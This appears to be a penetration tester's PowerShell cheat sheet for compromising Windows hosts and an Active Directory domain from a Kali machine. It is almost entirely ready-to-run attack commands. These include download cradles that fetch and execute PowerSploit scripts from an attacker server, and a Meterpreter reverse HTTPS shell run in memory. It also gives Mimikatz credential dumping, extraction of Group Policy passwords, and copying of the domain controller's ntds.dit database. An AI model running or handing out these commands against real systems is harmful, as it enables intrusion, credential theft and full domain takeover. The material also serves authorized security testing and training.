PowerShell - How To


# Download a file
- Load from Kali
cd /opt/PowerSploit/Recon/
python -m SimpleHTTPServer

- Windows
C:\> mkdir temp
C:\> cd temp
C:\temp> powershell -nop -exec bypass "IEX (New-Object Net.Webclient).DownloadFile('http://10.0.1.6:8000/PowerView.ps1', 'C:\temp\PowerView.ps1')"

# Upload a file
powershell -nop -exec bypass "IEX (New-Object Net.Webclient).UploadString('http://10.0.1.6/evil.ps1',"<PostDATA>")"

# Execute a remote file
powershell -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('http://10.0.1.6/PowerUp.ps1'); Invoke-AllChecks"
------------------------------------------------------------------------------------------------------

# PowerSploit - getting a shell without writing to disk

- Kali
msfvenom -p windows/x64/meterpreter/reverse_https lhost=10.0.1.6 lport=443 -f powershell -o /root/stager

msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set lhost 10.0.1.6
set lport 443
exploit -j

Open a new tab
cd /opt/PowerSploit/CodeExecution/
python -m SimpleHTTPServer

- Windows
powershell -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('http://10.0.1.6:8000/Invoke-Shellcode.ps1')"
Invoke-Shellcode -Payload windows/meterpreter/reverse_https -lhost 10.0.1.6 -lport 443 -Force
------------------------------------------------------------------------------------------------------

# Priv escalation

- Load from disk
powershell -nop -exec bypass
Import-Module .\PowerUp.ps1
Invoke-AllChecks

- Load from Kali
cd /opt/PowerSploit/Privesc/
python -m SimpleHTTPServer

- Windows
powershell -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('http://10.0.1.6:8000/PowerUp.ps1'); Invoke-AllChecks"

powershell -nop -NonI -w hidden -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://10.0.1.6:8000/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -lhost 10.0.1.6 -lport 443 -Force"
------------------------------------------------------------------------------------------------------

# Dump creds

- Load from Kali
cd /opt/PowerSploit/Exfiltration/
python -m SimpleHTTPServer

- Windows
powershell -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('http://10.0.1.6:8000/Invoke-Mimikatz.ps1'); Invoke-Mimikatz"
------------------------------------------------------------------------------------------------------

# Find open fileshares

- Load from Kali
cd /opt/PowerSploit/Recon/
python -m SimpleHTTPServer

- Windows
powershell -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('http://10.0.1.6:8000/PowerView.ps1'); Invoke-Netview"
Invoke-ShareFinder -CheckShareAccess

New-PSDrive S -PSProvider FileSystem -Root \\10.0.0.14\SYSVOL
PSDrive
Remove-PSDrive S
------------------------------------------------------------------------------------------------------

# Extract passwords from Group Policy

Import-Module PowerSploit.ps1
Get-GPPPassword

\\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\
Search xml files for cpassword.
GetDecryptedCpassword 'AES 256-bit encrypted password'
------------------------------------------------------------------------------------------------------

# Dump the DC database

Import-Module PowerView
Invoke-UserHunter
Import-Module PowerSploit
Invoke-Mimikatz -ComputerName <name>

Open a new PS window as Administrator.
Use the creds you just found.

Import-Module PowerView
Get-NetDomainController
Import-Module PowerSploit
Invoke-NinjaCopy -Path C:\windows\ntds\ntds.dit -LocalDistination C:\ntds.dit -ComputerName <DC name>
ls

